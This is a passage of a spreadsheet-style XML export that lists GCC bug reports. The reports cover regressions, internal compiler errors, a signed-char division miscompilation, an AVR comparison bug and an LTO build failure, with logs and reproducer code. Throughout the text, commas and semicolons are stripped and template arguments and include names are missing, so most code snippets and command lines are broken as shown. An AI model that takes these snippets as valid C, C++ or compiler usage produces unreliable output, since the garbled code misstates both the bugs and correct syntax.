        .align  2
.L2:
        .word   .LC0
        .size   TIM7_IRQHandler .-TIM7_IRQHandler
        .section        .rodata.str1.1aMS%progbits1
.LC0:
        .ascii  %i %i\000
        .ident  GCC: (GNU) 4.5.3</t>
  </si>
  <si>
    <t>domen</t>
  </si>
  <si>
    <t>GCC-59276</t>
  </si>
  <si>
    <t>Incorrect error message with modules of different gfortran versions</t>
  </si>
  <si>
    <t>This 'bug' might lead to some confusion. 
If an older version of gfortran (i.e. 4.8) reads a module generated with 4.9 the error message is:
Fatal Error: File 'm1.mod' opened at (1) is not a GNU Fortran module file
instead of the more useful variant one had with 4.8/4.7
Fatal Error: Wrong module version '10' (expected '9') for file 'm1.mod' opened at 
(1)
I don't see how this can be fixed other than fixing the error message on the release branches into '... not a module file compatible with this version of GNU Fortran'.</t>
  </si>
  <si>
    <t>GCC-20475</t>
  </si>
  <si>
    <t>static_cast falsely allows const to be cast away</t>
  </si>
  <si>
    <t>I just tried the following block of C++ code with g++ 20050311 the
latest snapshot.
void f()
{
        char * pj2 = static_cast  (fred)
}
The compiler said
dcb@linux:~/C++/src&gt; ~/gnu/20050311/results/bin/g++ -c sc.cc
I added more flags
dcb@linux:~/C++/src&gt; ~/gnu/20050311/results/bin/g++ -g -O2 -Wall -ansi -pedantic
-c sc.cc
sc.cc: In function `void f()':
sc.cc:5: warning: unused variable 'pj2'
dcb@linux:~/C++/src&gt;
However my reading of Stroustrup 3 page 414 section 15.4.2.1 says that
static_cast can't be used to cast away const.
I think the compiler should complain about the above code. Here is Intel C++ 8.1
doing what I want.
sc.cc(5): error: static_cast cannot cast away const or other type qualifiers
        char * pj2 = static_cast  (fred)
                     ^
This example derived from real code in Suse Linux 9.2</t>
  </si>
  <si>
    <t>GCC-71089</t>
  </si>
  <si>
    <t>[7 Regression] Failed to build 483.xalancbmk in SPEC CPU 2006</t>
  </si>
  <si>
    <t>On x86-64 r236012 caused:
g++  -O2 -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin  -DSPEC_CPU_LP64        AIXPlatformUtils.o CSetDefs.o BinHTTPURLInputStream.o Win32PlatformUtils.o Win32MsgLoader.o Win32TransService.o Win32TransService2.o WinSockNetAccessor.o SunCCDefs.o SolarisPlatformUtils.o GCCDefs.o LinuxPlatformUtils.o MIPSproDefs.o IRIXPlatformUtils.o HPCCDefs.o HPPlatformUtils.o WFXMLScanner.o ASCIIRangeFactory.o AbstractDOMParser.o AbstractNumericFacetValidator.o AbstractNumericValidator.o AbstractStringValidator.o AllContentModel.o AnySimpleTypeDatatypeValidator.o AnyURIDatatypeValidator.o AttrImpl.o AttrMapImpl.o AttrNSImpl.o BMPattern.o Base64.o Base64BinaryDatatypeValidator.o BinFileInputStream.o BinFileOutputStream.o BinInputStream.o BinMemInputStream.o BinMemOutputStream.o BinOutputStream.o BitSet.o BlockRangeFactory.o BooleanDatatypeValidator.o CDATASectionImpl.o CMAny.o CMBinaryOp.o CMUnaryOp.o CharToken.o CharacterDataImpl.o ChildNode.o ClosureToken.o CommentImpl.o ComplexTypeInfo.o ConcatToken.o ConditionToken.o ContentLeafNameTypeVector.o ContentSpecNode.o DFAContentModel.o DGXMLScanner.o DOMAttrImpl.o DOMAttrMapImpl.o DOMAttrNSImpl.o DOMBuilderImpl.o DOMCDATASectionImpl.o DOMCharacterDataImpl.o DOMChildNode.o DOMCommentImpl.o DOMConfigurationImpl.o DOMDeepNodeListImpl.o DOMDocumentFragmentImpl.o DOMDocumentImpl.o DOMDocumentTypeImpl.o DOMElementImpl.o DOMElementNSImpl.o DOMEntityImpl.o DOMEntityReferenceImpl.o DOMErrorImpl.o DOMException.o DOMImplementationImpl.o DOMImplementationRegistry.o DOMLocatorImpl.o DOMNamedNodeMapImpl.o DOMNodeIDMap.o DOMNodeImpl.o DOMNodeIteratorImpl.o DOMNodeListImpl.o DOMNodeVector.o DOMNormalizer.o DOMNotationImpl.o DOMParentNode.o DOMParser.o DOMProcessingInstructionImpl.o DOMRangeException.o DOMRangeImpl.o DOMString.o DOMStringPool.o DOMTextImpl.o DOMTreeWalkerImpl.o DOMTypeInfoImpl.o DOMWriterImpl.o DOMXPathException.o DOM_Attr.o DOM_CDATASection.o DOM_CharacterData.o DOM_Comment.o DOM_DOMException.o DOM_DOMImplementation.o DOM_Document.o DOM_DocumentFragment.o DOM_DocumentType.o DOM_Element.o DOM_Entity.o DOM_EntityReference.o DOM_NamedNodeMap.o DOM_Node.o DOM_NodeFilter.o DOM_NodeIterator.o DOM_NodeList.o DOM_Notation.o DOM_ProcessingInstruction.o DOM_Range.o DOM_RangeException.o DOM_Text.o DOM_TreeWalker.o DOM_XMLDecl.o DStringPool.o DTDAttDef.o DTDAttDefList.o DTDElementDecl.o DTDEntityDecl.o DTDGrammar.o DTDScanner.o DTDValidator.o DatatypeValidator.o DatatypeValidatorFactory.o DateDatatypeValidator.o DateTimeDatatypeValidator.o DateTimeValidator.o DayDatatypeValidator.o DecimalDatatypeValidator.o DeepNodeListImpl.o DefaultPanicHandler.o DocumentFragmentImpl.o DocumentImpl.o DocumentTypeImpl.o DomMemDebug.o DoubleDatatypeValidator.o Dummy.o DurationDatatypeValidator.o ENTITYDatatypeValidator.o ElemStack.o ElementDefinitionImpl.o ElementImpl.o ElementNSImpl.o EncodingValidator.o EntityImpl.o EntityReferenceImpl.o FieldActivator.o FieldValueMap.o FloatDatatypeValidator.o GeneralAttributeCheck.o Grammar.o GrammarResolver.o HashPtr.o HashXMLCh.o HeaderDummy.o HexBin.o HexBinaryDatatypeValidator.o IC_Field.o IC_Key.o IC_KeyRef.o IC_Selector.o IC_Unique.o IDDatatypeValidator.o IDREFDatatypeValidator.o IGXMLScanner.o IGXMLScanner2.o IconvTransService.o IdentityConstraint.o InMemMsgLoader.o InputSource.o KVStringPair.o ListDatatypeValidator.o LocalFileFormatTarget.o LocalFileInputSource.o Match.o MemBufFormatTarget.o MemBufInputSource.o MemoryManagerArrayImpl.o MemoryManagerImpl.o MixedContentModel.o ModifierToken.o MonthDatatypeValidator.o MonthDayDatatypeValidator.o Mutexes.o NCNameDatatypeValidator.o NOTATIONDatatypeValidator.o NameDatatypeValidator.o NamedNodeMapImpl.o NamespaceScope.o NodeIDMap.o NodeImpl.o NodeIteratorImpl.o NodeListImpl.o NodeVector.o NotationImpl.o Op.o OpFactory.o PSVIAttribute.o PSVIAttributeList.o PSVIElement.o PSVIItem.o PanicHandler.o ParenToken.o ParentNode.o ParserForXMLSchema.o PlatformUtils.o ProcessingInstructionImpl.o QName.o QNameDatatypeValidator.o RangeFactory.o RangeImpl.o RangeToken.o RangeTokenMap.o ReaderMgr.o RefCountedImpl.o RegularExpression.o RegxParser.o RegxUtil.o SAX2XMLReaderImpl.o SAXException.o SAXParseException.o SAXParser.o SGXMLScanner.o SchemaAttDef.o SchemaAttDefList.o SchemaElementDecl.o SchemaGrammar.o SchemaInfo.o SchemaSymbols.o SchemaValidator.o SimpleContentModel.o StdInInputSource.o StdOutFormatTarget.o StringDatatypeValidator.o StringPool.o StringToken.o SubstitutionGroupComparator.o SynchronizedStringPool.o TextImpl.o TimeDatatypeValidator.o Token.o TokenFactory.o TransService.o TraverseSchema.o TreeWalkerImpl.o URLInputSource.o UnicodeRangeFactory.o UnionDatatypeValidator.o UnionToken.o ValidationContextImpl.o ValueStore.o ValueStoreCache.o VecAttrListImpl.o VecAttributesImpl.o Wrapper4DOMInputSource.o Wrapper4InputSource.o XML256TableTranscoder.o XML88591Transcoder.o XMLASCIITranscoder.o XMLAbstractDoubleFloat.o XMLAttDef.o XMLAttDefList.o XMLAttr.o XMLBigDecimal.o XMLBigInteger.o XMLBuffer.o XMLBufferMgr.o XMLCanRepGroup.o XMLChTranscoder.o XMLChar.o XMLContentModel.o XMLDTDDescription.o XMLDTDDescriptionImpl.o XMLDateTime.o XMLDeclImpl.o XMLDouble.o XMLEBCDICTranscoder.o XMLElementDecl.o XMLEntityDecl.o XMLException.o XMLFloat.o XMLFormatter.o XMLGrammarDescription.o XMLGrammarPoolImpl.o XMLIBM1047Transcoder.o XMLIBM1140Transcoder.o XMLMsgLoader.o XMLNotationDecl.o XMLNumber.o XMLRangeFactory.o XMLReader.o XMLRecognizer.o XMLRefInfo.o XMLScanner.o XMLScannerResolver.o XMLSchemaDescription.o XMLSchemaDescriptionImpl.o XMLString.o XMLStringTokenizer.o XMLUCSTranscoder.o XMLURL.o XMLUTF16Transcoder.o XMLUTF8Transcoder.o XMLUni.o XMLUniCharacter.o XMLUri.o XMLValidator.o XMLWin1252Transcoder.o XMemory.o XObjectComparator.o XPathMatcher.o XPathMatcherStack.o XPathSymbols.o XProtoType.o XSAnnotation.o XSAttributeDeclaration.o XSAttributeGroupDefinition.o XSAttributeUse.o XSComplexTypeDefinition.o XSDDOMParser.o XSDElementNSImpl.o XSDErrorReporter.o XSDLocator.o XSElementDeclaration.o XSFacet.o XSIDCDefinition.o XSModel.o XSModelGroup.o XSModelGroupDefinition.o XSMultiValueFacet.o XSNamespaceItem.o XSNotationDeclaration.o XSObject.o XSObjectFactory.o XSParticle.o XSSimpleTypeDefinition.o XSTypeDefinition.o XSWildcard.o XSerializeEngine.o XTemplateComparator.o XTemplateSerializer.o XUtil.o XercesAttGroupInfo.o XercesDOMParser.o XercesElementWildcard.o XercesGroupInfo.o XercesXPath.o YearDatatypeValidator.o YearMonthDatatypeValidator.o sax2Dummy.o DOMServices.o DOMSupport.o DOMSupportDefault.o DOMSupportException.o DOMSupportInit.o TreeWalker.o XalanDocumentPrefixResolver.o XalanNamespacesStack.o AttributeListImpl.o AttributesImpl.o DOMStringHelper.o DOMStringPrintWriter.o DoubleSupport.o Writer.o ExecutionContext.o FormatterListener.o NamedNodeMapAttributeList.o NullPrintWriter.o PlatformSupportInit.o PrefixResolver.o PrintWriter.o Resettable.o StdBinInputStream.o StringTokenizer.o URISupport.o XSLException.o XalanBitmap.o XalanDOMStringCache.o XalanDOMStringAllocator.o XalanDOMStringHashTable.o XalanDOMStringPool.o XalanDecimalFormatSymbols.o XalanEncodingPropertyCache.o XalanFStreamOutputStream.o XalanFileOutputStream.o XalanICUMessageLoader.o XalanInMemoryMessageLoader.o XalanMessageLoader.o XalanNLSMessageLoader.o XalanNullOutputStream.o XalanNumberFormat.o XalanOutputStream.o XalanOutputStreamPrintWriter.o XalanParsedURI.o XalanReferenceCountedObject.o XalanSimplePrefixResolver.o XalanStdOutputStream.o XalanTranscodingServices.o XalanToXercesTranscoderWrapper.o XalanUTF16Transcoder.o XalanXMLChar.o NodeNameTreeWalker.o ICUResHandler.o InMemHandler.o MsgFileOutputStream.o NLSHandler.o SAX2Handler.o XalanMsgLib.o FormatterToDOM.o FormatterToHTML.o FormatterToNull.o FormatterToText.o FormatterToXML.o FormatterToXMLBase.o FormatterToXML_UTF16.o FormatterToXML_UTF8.o XMLSupportInit.o FormatterTreeWalker.o XMLParserLiaison.o XMLSupportException.o XalanHTMLElementsProperties.o ElementPrefixResolverProxy.o FormatterStringLengthCounter.o Function.o FunctionConcat.o FunctionContains.o FunctionID.o FunctionLang.o FunctionNamespaceURI.o FunctionNormalizeSpace.o FunctionStartsWith.o FunctionString.o FunctionSubstring.o FunctionSubstringAfter.o FunctionSubstringBefore.o FunctionTranslate.o MutableNodeRefList.o NodeRefList.o NodeRefListBase.o XBoolean.o XNodeSet.o XNodeSetAllocator.o XNodeSetBase.o XNodeSetNodeProxy.o XNodeSetNodeProxyAllocator.o XNodeSetResultTreeFragProxy.o XNull.o XNumber.o XNumberAllocator.o XNumberBase.o XObject.o XObjectFactory.o XObjectFactoryDefault.o XObjectResultTreeFragProxy.o XObjectResultTreeFragProxyBase.o XObjectResultTreeFragProxyText.o XObjectTypeCallback.o XPath.o XPathAllocator.o XPathConstructionContext.o XPathConstructionContextDefault.o XPathEnvSupport.o XPathEnvSupportDefault.o XPathEvaluator.o XPathExecutionContext.o XPathExecutionContextDefault.o XPathExpression.o XPathFactory.o XPathFactoryBlock.o XPathFactoryDefault.o XPathFunctionTable.o XPathInit.o XPathParserException.o XPathProcessor.o XPathProcessorImpl.o XSpan.o XString.o XStringAdapter.o XStringAdapterAllocator.o XStringAllocator.o XStringBase.o XStringCached.o XStringCachedAllocator.o XStringReference.o XStringReferenceAllocator.o XToken.o XTokenNumberAdapter.o XUnknown.o XTokenNumberAdapterAllocator.o XTokenStringAdapter.o XTokenStringAdapterAllocator.o XalanDocumentFragmentNodeRefListBaseProxy.o XalanQName.o XalanQNameByReference.o XalanQNameByValue.o XalanQNameByValueAllocator.o XalanXPathException.o XPathCAPI.o AVTPart.o AVT.o AVTPartSimple.o AVTPartXPath.o Constants.o CountersTable.o ElemApplyImport.o ElemApplyTemplates.o ElemAttribute.o ElemChoose.o ElemAttributeSet.o ElemCallTemplate.o ElemComment.o ElemCopy.o ElemCopyOf.o ElemDecimalFormat.o ElemElement.o ElemEmpty.o ElemFallback.o ElemExtensionCall.o ElemForEach.o ElemForwardCompatible.o ElemIf.o ElemLiteralResult.o ElemMessage.o ElemNumber.o ElemOtherwise.o ElemPI.o ElemParam.o ElemSort.o ElemTemplate.o ElemTemplateElement.o ElemText.o ElemTextLiteral.o ElemUse.o ElemValueOf.o ElemVariable.o ElemWhen.o ElemWithParam.o ExtensionFunctionHandler.o ExtensionNSHandler.o FunctionCurrent.o FunctionDocument.o FunctionElementAvailable.o FunctionFormatNumber.o FunctionFunctionAvailable.o FunctionGenerateID.o FunctionKey.o FunctionSystemProperty.o FunctionUnparsedEntityURI.o GenerateEvent.o KeyTable.o NamespacesHandler.o NodeSortKey.o NodeSorter.o OutputContextStack.o ProblemListener.o ProblemListenerDefault.o ResultNamespacesStack.o SelectionEvent.o Stylesheet.o StylesheetExecutionContext.o StylesheetConstructionContext.o StylesheetConstructionContextDefault.o StylesheetExecutionContextDefault.o StylesheetHandler.o StylesheetRoot.o TopLevelArg.o TraceListener.o TraceListenerDefault.o TracerEvent.o VariablesStack.o XResultTreeFrag.o XResultTreeFragAllocator.o XSLTEngineImpl.o XSLTInit.o XSLTInputSource.o XSLTProcessor.o XSLTProcessorEnvSupport.o XSLTProcessorEnvSupportDefault.o XSLTProcessorException.o XSLTResultTarget.o XalanAVTAllocator.o XalanAVTPartSimpleAllocator.o XalanAVTPartXPathAllocator.o XalanElemApplyTemplatesAllocator.o XalanElemAttributeAllocator.o XalanElemAttributeSetAllocator.o XalanElemCallTemplateAllocator.o XalanElemElementAllocator.o XalanElemEmptyAllocator.o XalanElemLiteralResultAllocator.o XalanElemTemplateAllocator.o XalanElemTextAllocator.o XalanElemTextLiteralAllocator.o XalanTemplate.o XalanElemValueOfAllocator.o XalanElemVariableAllocator.o XalanNumberingResourceBundle.o XalanSourceTreeDocumentAllocator.o XalanSourceTreeDocumentFragmentAllocator.o XalanSpaceNodeTester.o XalanAttr.o XalanCDataSection.o XalanCharacterData.o XalanComment.o XalanDOMException.o XalanDOMImplementation.o XalanDOMInit.o XalanDOMString.o XalanDocument.o XalanDocumentFragment.o XalanDocumentType.o XalanElement.o XalanEmptyNamedNodeMap.o XalanEntity.o XalanEntityReference.o XalanNamedNodeMap.o XalanNode.o XalanNodeList.o XalanNodeListDummy.o XalanNodeListSurrogate.o XalanNotation.o XalanProcessingInstruction.o XalanText.o XalanEXSLTCommon.o XalanEXSLTDateTime.o XalanEXSLTDynamic.o XalanEXSLTMath.o XalanEXSLTSet.o XalanEXSLTString.o FunctionDifference.o FunctionDistinct.o FunctionEvaluate.o FunctionHasSameNodes.o FunctionIntersection.o FunctionNodeSet.o XalanExtensions.o FormatterToSourceTree.o XalanSourceTreeAttr.o XalanSourceTreeAttrNS.o XalanSourceTreeAttributeAllocator.o XalanSourceTreeAttributeNSAllocator.o XalanSourceTreeComment.o XalanSourceTreeCommentAllocator.o XalanSourceTreeContentHandler.o XalanSourceTreeDOMSupport.o XalanSourceTreeDocument.o XalanSourceTreeDocumentFragment.o XalanSourceTreeElement.o XalanSourceTreeElementA.o XalanSourceTreeElementAAllocator.o XalanSourceTreeElementANS.o XalanSourceTreeElementANSAllocator.o XalanSourceTreeElementNA.o XalanSourceTreeElementNAAllocator.o XalanSourceTreeElementNANS.o XalanSourceTreeElementNANSAllocator.o XalanSourceTreeHelper.o XalanSourceTreeInit.o XalanSourceTreeParserLiaison.o XalanSourceTreeProcessingInstruction.o XalanSourceTreeProcessingInstructionAllocator.o XalanSourceTreeText.o XalanSourceTreeTextAllocator.o XalanSourceTreeTextIWS.o XalanSourceTreeTextIWSAllocator.o XalanCAPI.o XalanCompiledStylesheetDefault.o XalanDefaultDocumentBuilder.o XalanDefaultParsedSource.o XalanParsedSource.o XalanSourceTreeWrapperParsedSource.o XalanTransformer.o XalanTransformerOutputStream.o XalanTransformerProblemListener.o XercesDOMParsedSource.o XercesDOMWrapperParsedSource.o FormatterToXercesDOM.o XercesAttrWrapper.o XercesAttrWrapperAllocator.o XercesCDATASectionWrapper.o XercesCommentWrapper.o XercesDOMException.o XercesDOMFormatterWalker.o XercesDOMImplementationWrapper.o XercesDOMSupport.o XercesDOMWalker.o XercesDOMWrapperException.o XercesDocumentTypeWrapper.o XercesDocumentWrapper.o XercesEntityWrapper.o XercesElementWrapper.o XercesElementWrapperAllocator.o XercesEntityReferenceWrapper.o XercesLiaisonXalanDOMStringPool.o XercesNamedNodeMapAttributeList.o XercesParserLiaison.o FormatterToDeprecatedXercesDOM.o XercesAttrBridge.o XercesAttributeBridgeAllocator.o XercesBridgeHelper.o XercesBridgeNavigator.o XercesCDATASectionBridge.o XercesCommentBridge.o XercesDOMImplementationBridge.o XercesDOM_NodeHack.o XercesDocumentBridge.o XercesDocumentFragmentBridge.o XercesDocumentTypeBridge.o XercesElementBridge.o XercesElementBridgeAllocator.o XercesEntityBridge.o XercesEntityReferenceBridge.o XercesNamedNodeMapBridge.o XercesNodeListBridge.o XercesNotationBridge.o XercesProcessingInstructionBridge.o XercesTextBridge.o XercesTextBridgeAllocator.o XercesToXalanNodeMap.o XercesTreeWalker.o XercesNamedNodeMapWrapper.o XercesNodeListWrapper.o XercesNotationWrapper.o XercesProcessingInstructionWrapper.o XercesTextWrapper.o XercesTextWrapperAllocator.o XercesWrapperHelper.o XercesWrapperNavigator.o XercesWrapperToXalanNodeMap.o XalanExe.o                     -o Xalan
lto1: internal compiler error: in lto_output_node at lto-cgraph.c:473
0x949178 lto_output_node
	../../src-trunk/gcc/lto-cgraph.c:473
0x949178 output_symtab()
	../../src-trunk/gcc/lto-cgraph.c:1021
0x95ab1a lto_output()
	../../src-trunk/gcc/lto-streamer-out.c:2386
0x9c37ae write_lto
	../../src-trunk/gcc/passes.c:2452
0x9c73ca ipa_write_optimization_summaries(lto_symtab_encoder_d*)
	../../src-trunk/gcc/passes.c:2656
0x62721a do_stream_out
	../../src-trunk/gcc/lto/lto.c:2294
0x633ad8 stream_out
	../../src-trunk/gcc/lto/lto.c:2338
0x633ad8 lto_wpa_write_files
	../../src-trunk/gcc/lto/lto.c:2475
0x633ad8 do_whole_program_analysis
	../../src-trunk/gcc/lto/lto.c:3157
0x633ad8 lto_main()
	../../src-trunk/gcc/lto/lto.c:3317
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: g++ returned 1 exit status
compilation terminated.
/usr/local/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status
specmake[3]: *** [Xalan] Error 1</t>
  </si>
  <si>
    <t>GCC-12382</t>
  </si>
  <si>
    <t>[3.4 regression] targhooks.c:68: error: `asm_out_file' undeclared</t>
  </si>
  <si>
    <t>gcc -c   -g  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-p
rototypes -pedantic -Wno-long-long -fno-common   -DHAVE_CONFIG_H    -I. -I. -I..
/../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include  ../../gcc/gcc/targhook
s.c -o targhooks.o
../../gcc/gcc/targhooks.c: In function `default_external_libcall':
../../gcc/gcc/targhooks.c:68: error: `asm_out_file' undeclared (first use in thi
s function)
../../gcc/gcc/targhooks.c:68: error: (Each undeclared identifier is reported onl
y once
../../gcc/gcc/targhooks.c:68: error: for each function it appears in.)</t>
  </si>
  <si>
    <t>GCC-80341</t>
  </si>
  <si>
    <t>[5 Regression] gcc miscompiles division of signed char</t>
  </si>
  <si>
    <t>Created attachment 41140
Reproducer.
GCC generates incorrect code. Correct result is 90.
Reproducer:
&gt;$ cat foo.c
extern const signed char var_25
extern signed char var_465
void foo() { 
    var_465 = (unsigned short) var_25 / -55 
} 
&gt;$ cat main.c
#include 
extern void foo ()
const signed char var_25 = -84
signed char var_465 = 0
int main () {
    foo ()
    printf(%d\n (int) var_465)
    return 0
}
Run:
&gt;$ gcc main.c foo.c  ./a.out 
1
GCC version:
Rev. 246681
&gt;$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/vsevolod/workspace/gcc-dev/bin-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /home/vsevolod/workspace/gcc-dev/trunk/configure --prefix=/home/vsevolod/workspace/gcc-dev/bin-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170404 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-9301</t>
  </si>
  <si>
    <t>[regression] [mips-linux] gcc 3.2.1 SEGV in try_forward_edges</t>
  </si>
  <si>
    <t>mips-linux (native) gcc 3.2.1 ICEs on the following test case.
gdb indicates a SEGV in try_forward_edges.
gcc 3.2.1 from ftp://ftp.gnu.org/pub/gnu/gcc/gcc-3.2.1/gcc-core-3.2.1.tar.gz
built on a mips linux system like:
	tar xvfz gcc-core-3.2.1.tar.gz
	mkdir obj inst
	cd obj
	../gcc-3.2.1/configure --prefix=`pwd`/../inst
	gmake &amp;&amp; gmake install
test fails with -O2 or above but not with -O1 or less.
Release:
3.2.1
Environment:
mips-linux kernel 2.4.x.
How-To-Repeat:
see above.
More info on where it does/doesn't fail:
tried 3.2.1 as a native compiler for x86-linux as well no
ICE there at up to -O3.
3.2.1 also seems to have the problem on embedded mips targets
(e.g. mipsisa64sb1 8-) but I did not try that
configuration with an unmodified compiler.
a quick test of head-of-trunk with mipsisa32-elf
indicates problem is _not_ present there but I wouldn't
call my testing comprehensive.  8-)</t>
  </si>
  <si>
    <t>cgd</t>
  </si>
  <si>
    <t>GCC-77326</t>
  </si>
  <si>
    <t>[avr] Invalid optimization omits comparison</t>
  </si>
  <si>
    <t>Created attachment 39483
Preprocessed source generated by avr-gcc foo.c -Dissue -save-temps
This bug was originally reported to the Arduino bug tracker[1] but seems to be a avr-specific gcc bug.
A minimal program showing the problem:
        #include 
        #include 
        void test(void) __attribute__((weak))
        void va_pseudo(int flag...){
                va_list ap
                va_start (ap flag)
                va_end (ap)
        }
        int main(void) {
                #if defined(issue)
                        va_pseudo(1 2 3 4)
                #else
                        va_pseudo(1 2 3)
                #endif
                if(test!=NULL) {
                        test()
                }
                return 0
        }
When compiled with -O but without -Dissue this produces the following assembler:
        $ avr-gcc foo.c -O avr-objdump -d a.out
        a.out:     file format elf32-avr
        Disassembly of section .text:
        00000000 :
           0:   cf 93           push    r28
           2:   df 93           push    r29
           4:   cd b7           in      r28 0x3d        61
           6:   de b7           in      r29 0x3e        62
           8:   df 91           pop     r29
           a:   cf 91           pop     r28
           c:   08 95           ret
        0000000e :
           e:   1f 92           push    r1
          10:   83 e0           ldi     r24 0x03        3
          12:   8f 93           push    r24
          14:   1f 92           push    r1
          16:   82 e0           ldi     r24 0x02        2
          18:   8f 93           push    r24
          1a:   1f 92           push    r1
          1c:   81 e0           ldi     r24 0x01        1
          1e:   8f 93           push    r24
          20:   ef df           rcall   .-34             0x0 
          22:   0f 90           pop     r0
          24:   0f 90           pop     r0
          26:   0f 90           pop     r0
          28:   0f 90           pop     r0
          2a:   0f 90           pop     r0
          2c:   0f 90           pop     r0
          2e:   80 e0           ldi     r24 0x00        0
          30:   90 e0           ldi     r25 0x00        0
          32:   89 2b           or      r24 r25
          34:   09 f0           breq    .+2              0x38 
          36:   e4 df           rcall   .-56             0x0 
          38:   80 e0           ldi     r24 0x00        0
          3a:   90 e0           ldi     r25 0x00        0
          3c:   08 95           ret
Note the lines from 0x2e to 0x34 which implement the `if(test!=NULL)` which should of course always fail and skip the next `rcall`. Now when compiling this with -Dissue the `or r24 r25` line gets dropped making the generated code invalid:
        $ avr-gcc foo.c -O -Dissue avr-objdump -d a.out | grep -B 2 breq
          38:   80 e0           ldi     r24 0x00        0
          3a:   90 e0           ldi     r25 0x00        0
          3c:   09 f0           breq    .+2              0x40 
The diff between without and with -Dissue looks like this (jump addresses have been stripped to minimize the diff):
        @@ -156 +159 @@ :
         :
                 1f 92           push    r1
        +        84 e0           ldi     r24 0x04        4
        +        8f 93           push    r24
        +        1f 92           push    r1
                 83 e0           ldi     r24 0x03        3
                 8f 93           push    r24
                 1f 92           push    r1
        @@ -2416 +2717 @@ :
                 81 e0           ldi     r24 0x01        1
                 8f 93           push    r24
                 xx xx           rcall                    
        -        0f 90           pop     r0
        -        0f 90           pop     r0
        -        0f 90           pop     r0
        -        0f 90           pop     r0
        -        0f 90           pop     r0
        -        0f 90           pop     r0
        +        8d b7           in      r24 0x3d        61
        +        9e b7           in      r25 0x3e        62
        +        08 96           adiw    r24 0x08        8
        +        0f b6           in      r0 0x3f         63
        +        f8 94           cli
        +        9e bf           out     0x3e r25        62
        +        0f be           out     0x3f r0         63
        +        8d bf           out     0x3d r24        61
                 80 e0           ldi     r24 0x00        0
                 90 e0           ldi     r25 0x00        0
        -        89 2b           or      r24 r25
                 xx xx           breq                     
                 xx xx           rcall                    
                 80 e0           ldi     r24 0x00        0
                 90 e0           ldi     r25 0x00        0
As you can see the extra vararg changes the stack cleanup from a number
of pops to direct manipulation of the stack pointer which involves the
same registers (r24 and r25) as the `test` check.
When running without -O this bug does not occur. Then the check looks
like this:
        $ avr-gcc foo.c -Dissue avr-objdump -d a.out | grep -B 3 breq
          50:   80 e0           ldi     r24 0x00        0
          52:   90 e0           ldi     r25 0x00        0
          54:   00 97           sbiw    r24 0x00        0
          56:   09 f0           breq    .+2              0x5a 
Here the check uses the (slightly slower) sbiw instruction where the
-O version uses or. I suspect that the optimization that makes this
change is responsible for or at least involved in the bug. I couldn't
pinpoint the exact optimization responsible running without -O but
with all the options that -O is documented to turn on did not produce
the bug.
The above was tested using:
        Using built-in specs.
        COLLECT_GCC=avr-gcc
        COLLECT_LTO_WRAPPER=/usr/lib/gcc/avr/4.8.1/lto-wrapper
        Target: avr
        Configured with: ../src/configure -v --enable-languages=cc++ --prefix=/usr/lib --infodir=/usr/share/info --mandir=/usr/share/man --bindir=/usr/bin --libexecdir=/usr/lib --libdir=/usr/lib --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-libssp --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=avr
        Thread model: single
        gcc version 4.8.1 (GCC)
But the bug also occurs using:
        Using built-in specs.
        Reading specs from
        /home/matthijs/pkg-x86_64-unknown-linux-gnu/bin/../lib/gcc/avr/5.1.0/device-specs/specs-avr2
        COLLECT_GCC=/home/matthijs/pkg-x86_64-unknown-linux-gnu/bin/avr-gcc
        COLLECT_LTO_WRAPPER=/home/matthijs/pkg-x86_64-unknown-linux-gnu/bin/../libexec/gcc/avr/5.1.0/lto-wrapper
        Target: avr
        Configured with: /home/admin/avr-gcc-5.1.0/gcc-5.1.0/configure
        --disable-install-libiberty --disable-libssp --disable-libstdcxx-pch
        --disable-libunwind-exceptions --disable-nls --enable-fixed-point
        --enable-long-long --disable-werror --disable-__cxa_atexit
        --enable-checking=release --enable-clocale=gnu
        --enable-cloog-backend=isl --enable-gnu-unique-object --with-avrlibc=yes
        --with-dwarf2 --enable-languages=cc++ --disable-libada --disable-doc
        --enable-lto --enable-gold --disable-plugin
        --prefix=/home/admin/avr-gcc-5.1.0/pkg-x86_64-unknown-linux-gnu/
        --disable-shared --with-gnu-ld --host=x86_64-unknown-linux-gnu
        --build=x86_64-unknown-linux-gnu --target=avr
        Thread model: single
        gcc version 5.1.0 (GCC)</t>
  </si>
  <si>
    <t>matthijs</t>
  </si>
  <si>
    <t>GCC-51157</t>
  </si>
  <si>
    <t>[C++0x] decltype/typeof of template member with default template argument confuses g++</t>
  </si>
  <si>
    <t>cat &gt; t.cc &lt;&lt; EOF
struct Key
{
    typedef int Ser
}
template 
struct Shell
{
    template
    typename T::Ser getId() const
}
void func()
{
  decltype(
}
EOF
g++ -std=gnu++0x -c t.cc
# results in:
# '
# t.cc:13: confused by earlier errors bailing out
# GCC version 4.6.2</t>
  </si>
  <si>
    <t>GCC-47665</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in trunc_int_for_mode</t>
  </si>
  <si>
    <t>#include 
__m128d
foo (double *x __m128i y)
{
  return _mm_load_pd (x + _mm_cvtsi128_si32 (_mm_srli_si128 (_mm_slli_epi32 (y 2) 0)))
}
ICEs on i686-linux with -O2 -m32 -msse2 starting in between r166288 and r166429.</t>
  </si>
  <si>
    <t>GCC-35049</t>
  </si>
  <si>
    <t>[4.3 Regression] g++.dg/conversion/simd3.C:12: error: invalid operands to binary + (have 'float __vector__' and 'int __vector__')</t>
  </si>
  <si>
    <t>At rev. 131985 with the last patch for PR35035 g++.dg/conversion/simd3.C fails on i686-apple-darwin9 for both 32 and 64 bit modes with:
/opt/gcc/_gcc_clean/gcc/testsuite/g++.dg/conversion/simd3.C: In function 'void foo()':
